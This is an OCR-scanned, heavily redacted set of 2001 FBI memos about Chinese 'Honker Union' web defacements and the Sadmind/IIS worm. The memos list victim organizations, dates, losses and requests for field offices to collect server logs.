victim servers and provide FD 302s regarding the defacements and 
log files, and forward all information to SA 


++ 


b3 
b7E 


b6 
b7C 


(01/26/1998) 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/12/2001 


To: Detroit Attn: Bay Cit MI, Resident Agency 
saf | 


From: Chicago 
Squad IP/C 
Con 


312/786-3918 
Approved By: 
Drafted By: 
Case ID i: Pending) 


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set leads for Detroit Division, Bay City, Michigan 
Resident Agency, SA 


Administrative: Reference telephone call between SA[ ^ ]ena SA 
on May 9, 2001. 


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


May 9, 2001, sa[_|contacted ip ERES inform 
that SA had received a complaint regarding a Web site 


defacement possibly attributable to Chinese hackers. The site 
defaced was www.ironmans.net. The site contained the following 
Statement, "fuck USA Government fuck PoizonBOx 
contact:sysadminGyahoo.com.cn", a common statement seen on many 
of the defacements reported by other divisions. 


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 


b6 
b7C 
b7E 


b6 
b7C 


b7C 


To: i : Chicago 
Re: 05/12/2001 


LEAD (s): 
Set Lead 1: 
DETROIT 
AT BAY CITY, MI 
It is requested that SA perform appropriate 
investigation, more specifically, obtain log files from the 


victim server and provide an FD 302 regardin defacement 
log files, and forward all information to SA 


++ 


and 


b3 
b7E 


b6 
b7C 


(01/26/1998) é e 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/12/2001 
To: New Haven Attn:  NIPC Squad b3 
b7C 
From: Chicago í b7E 
Squad IP/C 


Contact: SA 312/786-3918 
Approved By: 
Drafted By: 
Case ID d: Pending) 


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set leads for New Haven Division, NIPC Squad, SA b6 
| | b7C 


^ pem tae Reference telephone call between sal and 


SA n May 8, 2001. 


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 8, 2001, e| contacted saA[ |to-inform 
that New Haven Division had receive wo complaints regarding Web 
Site defacements possibly attributable to Chinese hackers. The 
Sites were www.c2aircraft.com, the Web site for Command 
Technology, and www.americares.com, the Web site for Americares 
Company. The site for Command Technologies contained the 
following statement, "fuck USA Government fuck PoizonBOx 
contact:sysadminGyahoo.com.cn", à common statement seen on many 
of the defacements reported by other divisions. 


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 


/3 Oya b7C 


To: v m: Chicago 
Re: 05/12/2001 b3 


b7E 


Details for the Americares defacement were not 
available at the time of the telephone call. 


To: : Chicago 
Re: 05/12/2001 b3 


b7E 


LEAD (s): 
Set Lead 1: 
NEW HAVEN 
AT NEW HAVEN, CT 
It is requested that QNEM LS appropriate b6 
investigation, more specifically, obtain log files from the b7C 


victim servers and provide FD 302s regarding the defacements and 
log files, and forward all information to SA 


++ 


(01/26/1998) 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/12/2001 
To: New Orleans Attn: Squad 6 b3 
ssap d 5 
b7C 
From: Chicago b7E 
Squad IP/C 


Contact: SA 312/786-3918 
Approved By: 
Drafted By: 
Case ID i: Pending) 


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set lead for New Orleans Division, Squad 6, sas[ |] bé 
b7C 


Administrative: Reference telephone call between Sas| ^ Jana 
and sa[ Jon May 8, 2001. 


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 8, 2001, SAs| __]contacted sa[ ]to 
inform that New Orleans Division had received a complaint from 


Tulane University regarding a Web site defacement with the 
following statement, "fuck USA Government fuck PoizonBOx 
contact:sysadminGyahoo.com.cn", a common statement seen on many 
of the defacements reported by other divisions. The defacement 
was on the Web site for the Tulane Primate Center, 


www.tpc.tulane.edu. 


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 


Tos om: Chicago 
Re: 05/12/2001 b3 


b7E 


LEAD (s): 
Set Lead 1: 
NEW ORLEANS 
AT NEW ORLEANS, LA 


It is requested that O C b6 
appropriate investigation, more sp 7 ain log files b7C 


from the victim servers and provide FD 302s regarding the 
defacements and log files, and forward all information to SA 


++ 


Pae 


, e e 


FEDERAL BUREAU OF INVESTIGATION 


(01/26/1998) 


Precedence: ROUTINE Date: 05/12/2001 
To: Newark Attn:  NIPC Squad b3 
b7C 
From: Chicago b7E 
Squad IP/C 


Contact: SA 312/786-3918 
Approved By: 


Drafted By: 


Case ID i: 

Title: Subject:  Hacker/Honker Union of China 
Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


b6 


E To set leads for Newark Division, NIPC Squad, SAs ae 
Administrative: R ce telephone calls between sal | SA 


on May 7 and 8, 


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 7 and 8, 2001, SAs 
contacted sal Jeo inform that Newark Division was receiving 
numerous complaints regarding Web site defacements originating 
from IP addresses in China with derogatory statements toward the 
United States. Many of the sites contained the following 
Statement, "fuck USA Government fuck PoizonBOx 
contact:sysadminGyahoo.com.cn", a common statement seen on many 
of the defacements to date reported by other divisions. 


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 


N 


To: Newark From: Chicago 
b7E 


LEAD(s): 
Set Lead 1: 
NEWARK 
AT NEWARK, NJ 


It is requested that  MEMEEECCEER 2 b6 
appropriate investigation, more specifically, obtain log files b7C 


from the victim servers and provide FD 302s regarding the 
pope and log files, and forward all information to SA 


** 


(01/26/1998) 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/09/2001 


To: Minneapolis Attn: Bismarck, ND Resident Agency 


2 | naa 


From: Chicago 
Squad IP/C 
Contact: 


SA 312/786-3918 
Approved By: 
Drafted By: 
Case ID d: 


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set lead for Minneapolis Division, Bismarck, ND 
Resident Agency, SAL] 


Administrative: Reference telephone call between sal Jra SA 
on May 7, 2001. 


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form page 
defacements. On May 7, 2001, SA contacted SA to 
inform that the Web site of River City Boats and four Web sites 
run by Schumacher Diamond Specialists, had been the victims of a 
Web site defacement. The statement on the Web sites, "fuck USA 
Government fuck PoizonBOx contact: sysadmin@yahoo.com.cn", isa 
common statement seen on many of the defacements to date reported 
by other divisions. Other victims of this defacement have traced 
the IPs back to the People's Republic of China. 


b3 
b6 
b7C 
b7E 


b6 
b7C 


b7C 
b7E 


P5 


To: Minneapolis From: Chicago 
Re: (05/09/2001 


LEAD (s): 
Set Lead 1: 
MINNEAPOLIS 
AT BISMARCK, ND 
It is requested that SA[ ^ ]perform appropriate 
investigation, more specifically, obtain log files from the 


victim servers and provide FD 302s regarding efacement and 
log files, and forward all information to SA 


++ 


b3 
b7E 


b6 
b7C 


(01/26/1998) 


e 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/21/2001 
To: Houston Attn: NIP b3 
b7C 
From: Chicago b7E 
Squad IP/C 


Con 312/786-3918 
Approved By: 
Drafted By: 
Case ID i: Pending) 


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set leads for Houston Division, NIPC Squad. 


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 14, 2001, sa| ]receivea, via e-mail, b6 
information that Houston Division was receiving numerous bic 
complaints regarding Web site defacements possibly attributable 
to Chinese hackers. 


To: im Chicago 
Re: 05/21/2001 b3 
b7E 


LEAD (s) 3 
Set Lead 1: 
HOUSTON 


AT HOUSTON, TX 


It is requested that the Houston Division NIPC Squad 
perform appropriate investigation, more specifically, obtain log 
files from the victim servers and provide FD 302s regarding the 
[optem and log files, and forward all information to SA b6 
b7C 


++ 


(01/26/1998) 


e 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/21/2001 


To: Philadelphia Attn:  NIPC Squad 
SSA | | 


From: Chicago 
Squad IP/C 
Co 


312/786-3918 
Approved By: 
Drafted By: 
Case ID d: Pending) 


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set leads for Philadelphia Division, NIPC Squad, SA 
rer Reference telephone call between sa[ Joa 


SA on May 21, 2001. 


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 21, 2001, SA[ contacted SA[ . ]to inform 
that Philadelphia Division had received numerous complaints 
regarding Web site defacements possibly attributable to Chinese 
hackers. Many of the sites contained the following statement, 
"fuck USA Government fuck PoizonBOx 
contact:sysadminGyahoo.com.cn", a common statement seen on many 
of the defacements reported by other divisions. 


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 


WA bee | 


b3 
b6 
b7C 
b7E 


b6 
b7C 


To: Phil hia From: Chicago 
Re: 05/21/2001 


LEAD (s): 
Set Lead 1: 
PHILADELPHIA 


AT PHILADELPHIA, PA 


It is requested that SA[ — |perform appropriate 
investigation, more specifically, obtain log files from the 
victim servers and provide FD 302s regarding the defacements 
log files, and forward all information to SA 


++ 


b3 
b7E 


b6 
b7C 


and 


(01/26/1998) 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/21/2001 
To: Louisville Attn:  NIPC Squad Pa 
b7C 
From: Chicago B/E 
Squad IP/C 
Contact: SA 312/786-3918 


Approved By: 
Drafted By: 
Case ID i: 


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: leads for Louisville Division, NIPC Squad, SA b6 
| | b7C 


Administrative: Reference telephone call between sa| ana 
sa| jon May 21, 2001. 


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 21, 2001, SA[ | — ]contacted SA to 
inform that Louisville Division had received three complaints 
regarding Web site defacements possibly attributable to Chinese 
hackers. The sites contained the following statement, "fuck USA 
Government fuck PoizonBOx contact:sysadmin@yahoo.com.cn", a 
common statement seen on many of the defacements reported by 
other divisions. 


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 


b3 
b6 
b7C 


Hh Oled" 


To: isvi : Chicago 
Re: 05/21/2001 b3 
b7E 


Set Lead 1: 
LOUISVILLE 
AT LOUISVILLE, KY 
It is requested that QNEM — appropriate b6 
investigation, more specifically, obtain log files from the b7C 


victim servers and provide FD 302s regarding efacements and 
log files, and forward all information to SA 


++ 


(Rev. 08-28-2000) | e 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/21/20 
To: Chicago 
From: Chicago 

Squad IP/C 

Contact: sa| | ]s12/786-3218 


Approved By: 


Drafted By: 
Case ID d: ending) 


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To open Sub file for the above captioned case. 
Details: Due to the large number of complaints received 


regarding the above captioned case, it is requested the Sub 
listed below be opened: 


[| 


++ 


01 


file 


b3 
b6 
b7C 
b7E 


b3 
b7E 


- 


| (Rev. 08-28-2000) e e 


5 FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/23/2001 


To: Counterterrorism Attn: NIPC, CIU sal O e] e 
a 


Chicago b7C 


From: Cleveland b7E 


Squad 16 
Contact: 


SA (216)622-6917 


Approved By 
Drafted By: 


Case ID d: Pending) 


Title:  UNSUB(S), CHINA; 
NORTH AMERICAN BENEFITS NETWORK, 
ROCKY RIVER, OH - VICTIM; 
COMPUTER INTRUSIONS 


Synopsis: To report complaint received at Cleveland Division re: 
victims of SADMIND/IIS worm originating from China. 


Enclosure: One original FD-71. 


Details: In response to a compliant received at Cleveland 
Division, writer telephonically contacted 
North American Benefits Network (NABN 

Detroit Road, Rocky River, OH, work telephone number 
on On 05/09/2001. [advised as follows: 


b6 
b7C 


On 05/08/2001, between 12:00pm and 1:00pm, three 
computers at NABN were compromised: 1) MS Windows NT v4.0 
(service pack 6a) server, MS Internet Information Server (IIS) 
v4.0, and MS Exchange v5.5, IP address 63.103.197.194; 2) Windows 
2000 Server, IIS v5.0, IP address 63.103.197.198; 3) Windows 2000 
Server, IIS v5.0, IP address 63.103.197.199. On all three 
computers, the home page was replaced with a page that said "fuck 
the U.S. government." The NT computer performs external mail 
functions and port 80 was open. The 2000 computers perform 
terminal services. 


The NABN firewall (a gnat machine), IP address 
63.103.197.196, logged the intruder's IP address as 
216.160.67.237. Said IP address is registered to Hammock 
Consulting Services Inc., 1005, High Avenue S, Renton, VA. 


b7E 


To: ism From: Cleveland 
‘Re: e 05/23/2001 


As of 05/09/2001, the NT computer was offline as a 
result of the attack. The 2000 computers were offline for 
approximately 1.5 days as a result of the attack. 


Cleveland Division is providing the aforementioned 
information to NIPC for informational purposes and to Chicago 
Division for any action deemed appropriate. 


b3 
b7E 


TOt. ism From: Cleveland 
Re: 05/23/2001 b3 


b7E 


LEAD (s): 
Set Lead 1: 
COUNTERTERRORISM 
AT WASHINGTON, DC 
Read and clear. 
Set Lead 2: 
CHICAGO 
AT CHICAGO, IL 
Take action deemed appropriate. 
++ 


FD-71 (Rev. 3-27-95) e 
Complaint Form 


NOTE: Hand print names legibly: handwriting satisfactory for remainder. 
Indices: L] Negative [7] See below 


Subject's name and aliases Character of case 
b3 
UNSUB 
b7E 
Complainant Protect Source 
b6 
b7C 


Complaint received 


[.] Personal Telephonic Date 5/9/01 Time, 10:15 a 


Address of Subject Complainant's address and telephone number 


North American Benefits Network 
19800 Detroit Rd, Rocky River, OH 


Complainant's DOB Sex 
Male 


Scars, marks and other data 


Employer Address Telephone 


Subject's 
Description 


Vehicle Description 


Facts of Complaint 


Benefits Network (NABW), advised that the company's network had been b7C 


hacked into on 5/8/01. The hacker came in through a dial-in port and 
altered several web pages with the words "fuck the U.S. Government." 
North American Benefits Network operates as a healthcare administrator 
for 39 states throughout the country. 


which oversees the websites, an provide the 
Specific technical information regarding the hack. 


Do not write in this space. 


b6 
b7C 


omplaint received by) BLOCK STAMP 


NEN that when NABW contacted the company 
that services their network, the company representative indicated 
that Charter One bank had also been hacked into. Based upon the 
message left by the hacker, the Charter One hack appears to have 


been done by the same individual. 


b6 
b7C 


as 


FD-542 (Rev. 11-02-1999) = 8 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/23/2001 
To: Chicago Attn: SA [.-- —— 
Cleveland l 
From: Cleveland 
Squad 16 i 
Contact: S (216)622-6917 


Approved B 
Drafted By: 


Case ID #: 


Title: UNSUB (S), CHINA; 
NORTH AMERICAN BENEFITS NETWORK, 
ROCKY RIVER, OH - VICTIM; 
COMPUTER INTRUSIONS 


Synopsis: To report investigative accomplishments re: captioned 
matter to Chicago Division. 


Details: The following investigative accomplishments are being 
reported for investigative efforts related to recent Cleveland 
Division complaints re: SADMIND/IIS worm originating from China. 
Complaints were sent Chicago Division - captioned mattter. 


Accomplishment Information: 
Number: 1 


Type: NIPCIP COMPROMISED SITE IDENTIFIED AND NOTIFIED 
ITU: NIPCIP 


Claimed By: 
SSN: 
Name: 
Squad: 16 
Number: 1 


Type: NIPCIP VICTIM CONTACTED/INTERVIEWED 
ITU: NIPCIP 
Claimed By: 

SSN: 


Squad: 16 


b3 
b6 
b7C 
b7E 


b6 
bp7C 


b7E 


To: Chicago From: b uus 
Res [95/28/2001 


Number: 1 
Type: NIPCIP FOREIGN SOURCE IP ADDRESS IDENTIFIED 
ITU: NIPCIP 
Claimed B 
SSN: 
Name 
Squa 


Number: 1 
Type: NIPCIP SUBJECT TOOL/EXPLOIT/MALICIOUS CODE IDENTIFIED 
ITU: NIPCIP 
Claimed By 
SSN: 
Name: 
Squad: 


b3 
b7E 


b6 
b"7C 


To: i E 
Re: 05/23/2001 
LEAD (s): 
Set Lead 1: 

CHICAGO 


AT CHICAGO, IL 


Read and clear. 


** 


e 


b3 
b7E 


FEDERAL BUREAU OF INVESTIGATION 


FD-542 (Rev. 11-02-1999) 


Precedence: ROUTINE Date: 05/17/2001 
N kdags atn: sald b3 
ve a b6 
b7C 
From: Cleveland DIE 
Squad 16 
C i (216)622-6917 
Approved By 
Drafted By: 
Case ID d: (Pending) 
ding) 
Title:  UNSUB(S), CHINA; 
SOUTHWEST GENERAL HOSPITAL, CLEVELAND, OH; 
BETHUNE COOKMAN COLLEGE, DAYTONA BEACH, FL; 
COMPUTER INTRUSIONS 
Synopsis: To report investigative accomplishments re: captioned 
matter to Chicago Division. 
Details: The following investigative accomplishments are being 
reported for investigative efforts related to recent Cleveland 
Division complaints re:  SADMIND/IIS worm originating from China. 
Complaints were sent Chicago Division - captioned mattter. 
Accomplishment Information: 
Number: 2 
Type: NIPCIP COMPROMISED SITE IDENTIFIED AND NOTIFIED 
ITU: NIPCIP 
Claimed By 
SSN: b6 
Name: b7C 
Squad: 16 
Number: 2 


Type: NIPCIP VICTIM CONTACTED/INTERVIEWED 
ITU:  NIPCIP 


Claimed By; 
SSN: 
Name: 


Squad: 16 


Number: 2 


To: Chicago From: D B 
Re: [D —— ] 05/17/2001 p3 


b7E 


Type: NIPCIP FOREIGN SOURCE IP ADDRESS IDENTIFIED 
ITU: NIPCIP 


Claimed By: 
SSN: b6 
Name: b7C 


Squad: 16 


Number: 1 
Type: NIPCIP SUBJECT TOOL/EXPLOIT/MALICIOUS CODE IDENTIFIED 
ITU:  NIPCIP i 


Claimed By 
SSN: 
Name: 


Squad: 16 


To: Chicado From: B 
re: Doo — —— —] 08/17/2001 


LEAD (s): 
Set Lead 1: 
CHICAGO 


AT CHICAGO, IL 
Action deemed appropriate. 


++ 


b3 
b7E 


< 


FD-542 (Rev. 11-02-1999) 2 p 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/17/2001 


To: Chicago Attn: sat b3 
b6 


Cleveland 
b7C 
From: Cleveland b7E 
Squad 16 
c 


(216) 622-6917 
Approved B 
Drafted By: 


Case ID #: Pending) 


Title:  UNSUB(S), CHINA; 
DIGICOMM TECHNOLOGY INC., MAUMEE, OH - VICTIM; 
COMPUTER INTRUSIONS 


Synopsis: To report investigative accomplishments re: captioned 
matter to Chicago Division. 


Details: The following investigative accomplishments are being 
reported for investigative efforts related to recent Cleveland 
Division complaints re:  SADMIND/IIS worm originating from China. 
Complaints were sent Chicago Division - captioned mattter. 


Accomplishment Information: 


Number: 1 

Type: NIPCIP COMPROMISED SITE IDENTIFIED AND NOTIFIED 

ITU: NIPCIP 

Claimed By: 
SSN: b6 
Name: b7C 
Squad: 16 


Number: 1 
Type: NIPCIP VICTIM CONTACTED/INTERVIEWED 
ITU: NIPCIP 
Claimed By; 
SSN: 
Name: 
Squad: 16 


Number: 13 
Type: NIPCIP FOREIGN SOURCE IP ADDRESS IDENTIFIED 


b7E 


To: i : D 
Re: 05/17/2001 b3 
b7E 


ITU: NIPCIP 


Claimed By; 
SSN: b6 
Name: b7C 
Squad: 

Number: 1 


Type: NIPCIP SUBJECT TOOL/EXPLOIT/MALICIOUS CODE IDENTIFIED 
ITU: NIPCIP 


Claimed By: 
SSN: 
Name: 


Squad: 16 


To: Chicago From: B ues 
-— 05717/2001 


LEAD (s): 
Set Lead 1: 
CHICAGO 


AT CHICAGO, II 


Read and clear. 


++ 


i* 


(Rev, 08-28-2600) $ © 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/22/2001 


To: Counterterrorism Attn: NIPC, CIU, SSA b3 
Chicago SA b6 
g d. : b7C 


From: Cleveland 
Squad 16 
: (216) 622-6917 


Approved B 
Drafted By 
Case ID i: 


(Pending) 
ing) 


Title:  UNSUB(S), CHINA; 
DIGICOMM TECHNOLOGY INC., MAUMEE, OH - VICTIM; 
COMPUTER INTRUSIONS f 


Synopsis: To report complaint received at Cleveland Division re: 
victims of SADMIND/IIS worm originating from China. 


Enclosure: One FD-340 containing evidence from Digicomm 
Technology Inc. 


Details: In response to an E-mail complaint filed with NIPC 

Watch and Warning Unit on 05/17/2001, writer telephonically 

contacted Digicomm Technology Inc. (DTI), b6 

135 Chesterfield Lane, #203, Maumee, OH, work telephone number b7C 
on On 05/22/2001. LL ]Jaavisea as follows: 


Sometime on the morning of 05/15/2001, the home page on 
DTI's external E-mail server, neo.digicomm-tech.com, IP address 
207.43.111.114, was defaced with anti-American remarks "Fuck the 
U.S. government" and "Fuck poizon box." The victim computer was 
running MS Windows 2000 Server (service pack 1), MS Internet 
Information Server (IIS) v5.0, and MS Exchange v5.5. The victim 
computer is an E-mail server. The following files were installed 
on the victim computer in all sub-directories of IIS: index.htm, 
index.asp, default.htm, and default.asp. The file, command.exe, 
located in the /scripts directory, was renamed to root.exe. 


Log file, ex010515.txt, on the victim computer, 
identified the originating IP address of the attack as 
211.93.80.20 (China). The log file is contained on a floppy 
diskette in the enclosed FD-340. Also, enclosed the in the FD- 


b3 
b7E 


5 


To: Counter 9 From: Cleveland 
Re: 05/22/2001 


340, is a report, provided | esl of subsequent failed 
intrusion attempts originating from Southeast Asia. 


did not discover the problem until 05/17/2001. 
To date, DTI has incurred a financial loss of approximately $675 
in man hours investigating the incident. 


Cleveland Division is providing the aforementioned 
information to NIPC for informational purposes and to Chicago 
Division for any action deemed appropriate. 


To: m From: Cleveland : 
Re: 05/22/2001 PS 


b7E 


LEAD (s): 
Set Lead 1: 
COUNTERTERRORISM 
AT WASHINGTON, DC 
Read and clear. 
Set Lead 2: 
CHICAGO 
AT CHICAGO, IL 
Take action deemed appropriate. 
++ 


e ó 


FEDERAL BUREAU OF INVESTIGATION 


(Rev. 08-28-2000) 


Precedence: ROUTINE Date: 05/22/2001 
To: Counterterrorism Attn:  NIPC, CIU 
SSA 
Chicago SA 
From: Cleveland 
Squad 16 
Contact: SA 216-622-6904 


Approved B 


Drafted By: 


Case ID #: (P i | | 
(Pending 
Title: Unsub(s); 


Jesu Catholic Elementary School - Victim; 
Impairment - Web Page Defacement 


Synopsis: Web page defacement in the Cleveland FO territory. 


Details: of Jesu Catholic Elementary School, 
located at 2450 Miramir Street, University Heights, Ohio 44118, 
employment telephone number of informed the Agent 


that the school's web page had been defaced by an Unsub(s) on 
May 16, 2001. 


The web page was defaced with the following: 
"Fuck USA Government 
Fuck POIZON BOX 


Contact; Sysadmcn@Yahoo.com.cn" 


Jesu Catholic Elementary School's computer network was 
not manipulated beyond the web page defacement. The files on the 
network were not deleted or corrupted and no harmful viruses were 
discovered. 


Jesu Catholic Elementary School suffered a financial 
loss of less than $1,000.00 in regards to this web page 
defacement. 


b3 
b6 
b7C 
b7E 


b6 
b7C 


To: Counterterrorism From: 


LEAD (s): 
Set Lead 1: (Adm) 
COUNTERTERRORISM 


AT WASHINGTON, DC 


Read and Clear. 
Set Lead 2: (Adm) 
CHICAGO 


AT CHICAGO 


Cleveland e 


Re: (05/22/2001 b3 
b7E 


This information is provided to Chicago for whatever 
investigative action is deemed appropriate. 


** 


s 


E! 


d 
m e 


FEDERAL BUREAU OF INVESTIGATION 


(Rev. 08-28-2000) 


Precedence: ROUTINE Date: 05/22/2001 
To: Counterterrorism Attn:  NIPC, CIU 
SS 

Chicago SA 

From: Cleveland 
Squad 16 
i 216-622-6904 

Approved B 
Drafted By 


Title: Unsub(s) ; 
CRM Solutions - Victim; 
Impairment - Web Page Defacement 


Case ID #: mn 


Synopsis: Web page defacement in the Cleveland FO territory. 


bétsirew[. ...... “ee CRM Solutions, located at 4065 Shuffel 
Drive N.W h Canton, Ohio 44770, employment telephone number 
of informed the Agent that on May 9, 2001 their web 
page had been defaced by an Unsub(s). 


The web page had been defaced with the following: 
"PUCK USA Government" 


also informed the Agent that approximately one 
week prior to the web page defacement, their computer network had 
been scanned by an Unsub(s). [____]|believed that the Unsub(s) had 
performed reconnaissance of their network prior to defacing the 
web site. 


Subsequent to the web page defacement, [____Jand his 
employees analyzed CRM's computer network and discovered that one 
of the drives had been 'wormed' via 'IIS' and the Unsub(s) had 
gained access to their network via a buffer overflow. 


b3 
b6 
b7C 
b7E 


b6 
b7C 


To: Counterterrorism From: Cleveland e 


b7E 


LEAD (s): 
Set Lead 1: (Adm) 
COUNTERTERRORISM 


AT WASHINGTON, DC 


Read and Clear. 
Set Lead 2: (Adm) 
CHICAGO 
AT CHICAGO 
This information is provided to Chicago for whatever 


investigative action is deemed appropriate. 


++ 


a 


(Rev. 08-28-2000) e " E - 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/16/2001 


To: Counterterrorism Attn: NIPC, CIU b3 


Chicago, SA b7C 
m b7E 


From: Cleveland 


216.622.6867 


Drafted By 

Case ID #: 

Title: Unsub (s); 
Relevant Business Solutions - Victim; 
Impairment - Web Page Defacement 


Synopsis: Web page defacement in the Cleveland FO territory. 


Enclosure(s): One (1) floppy diskette containing a compressed 
directory and log file. 


b6 
b7C 


Details: On 05/15/20 of Relevant Business 


Solutions, telephone email. 

advised that oné of his company's web 
pages located at http://phone.relevantsolutions.com had been defaced 
by a hacker. The normal contents of the web page were replaced with 
the words "fuck USA Government fuck PoizonBOx 
contact:sysadmeneyahoo.com.cn" . [ — ]was not aware of how his 
web page was defaced nor of how much damage was done to his system 
aside from the defaced web page| [provided writer with a 
compressed file containing the contents o is company's wwwroot 
directory and a month of log files from the system. 


b7E 


A From: 


Cl eveland e , 


To:  Counterterror 
Re: 05/16/2001 : b3 


LEAD(s): 
Set Lead 1: (Adm) 
COUNTERTERRORISM 


AT WASHINGTON, DC 


Read and Clear. 
Set Lead 2: (Adm) 
CHICAGO 


AT CHICAGO 


b7E 


This information is provided to Chicago for whatever 
investigative action is deemed appropriate. 


++ 


b6 
| b7C 
| ECHeuer/fax (Secure — ) 
| "d Set Tickler: ( Ü {3 o \ sure(si Attachments) 
zT Tustructions: Close Case/Clearlead, — .serigb — 


í b6 
Send EC.letter/fax (Secure — ) f b7C 


Enelosurecst Attachment(s) 


Close Case ‘Clear kad |. serial LF , 


X x p 
(Rev. 10-01-1999) 8 e 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/23/2001 
b6 
From: Atlanta b7C 
"^ Squad 17 . b7E 
Contact: x6220 


Approved By: 


Drafted By: 


P SEEN endin] | 


Title:  Hacker/Honker Union of China 
Illinois Secretary of State - Victim 
Computer Intrusion 
04/03/2001 


Synopsis: To advise Chicago of complaints involving Chinese 
Hacker activity received by Atlanta Division. 


Administrative: Re telcal of sa[_Jto sa C] bs 


on 5/22/2001. b7C 


sent to Atlanta by complainants. 


Details: Over the last several weeks Atlanta has received 
numerous complaints regarding website defacements with pro- 
Chinese/anti-US messages. Most of the defacements matched 
characteristics of the Sadmind worm. They appeared to be 
Scripted defacements where the same file, named index.htm, 
index.asp, default.htm, and default.asp was written to multiple 
locations on the webserver, in an attempt to deface it. Atlanta 
does not intend to open any cases on these complaints, as the 
reported damage has been minimal. Atlanta requested webserver 
log files from each complainant, but only a fraction of them have 
provided the requested information. Atlanta plans no further 
investigation into these matters. 


The following complainants responded back to the 
Atlanta Division as of 5/23/2001: 


Name: [ 1] Es 


Company:  Souther -Qn iates bic 
Telephone Number: 


Enclosure(s): Eleven 1A Envelopes containing copies of e-mails 


b7E 


To: Chicago From: b. e 
re: [ — — — —] 05/23/2001 


Date of Complaint: 5/18/2001 

Nature of Complaint: Two defaced NT/IIS webservers (1 matching 
Sadmind characteristics, the other was unknown), and one Unix 
machine they reloaded because it crashed. No positive indication 
of hacking on the Unix machine. 


Name: 


Company: Healthcare Technologies Inc. 

Telephone Number: E 

Date of Complaint: 5/10/2001 

Nature of Complaint:  Defaced webserver (matching Sadmind 


characteristics). Ed included other, unrelated hacking 
incidents in his complaint that dated back to February 2001. 


Company:  VSI Enterprises 
Telephone Number: Sj 
Date of Complaint: 5/7/01 


Nature of Complaint: Website defacement, NT/IIS server. 
Characteristics match Sadmind worm. 


Name: 
Company: T Communications 


Telephone Number: 
Date of Complaint: 5/6/01 
Nature of Complaint: Website defacement, NT/IIS server. 


Name: 

Company: Facility Pro 

Telephone Number: 

Date of Complaint: 5/6/2001 

Nature of Complaint: Website defacement, NT/IIS server. 
Characteristics match Sadmind worm. 


Name:[ 0 ennd 
Company: Shared Services 


Telephone Number: 

Date of Complaint: 5/11/2001 

Nature of Complaint: Website defacement, NT/IIS server. 
Characteristics match Sadmind worm. 


Name: 


Company: Bulloch County School System 
Tel pi ni Number: — 
Date of Complaint: 5/9/2001 


Nature of Complaint: Website defacement, NT/IIS server. 
Characteristics match Sadmind worm. 
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To: Chicago From: Atlanta 
g—DLS 


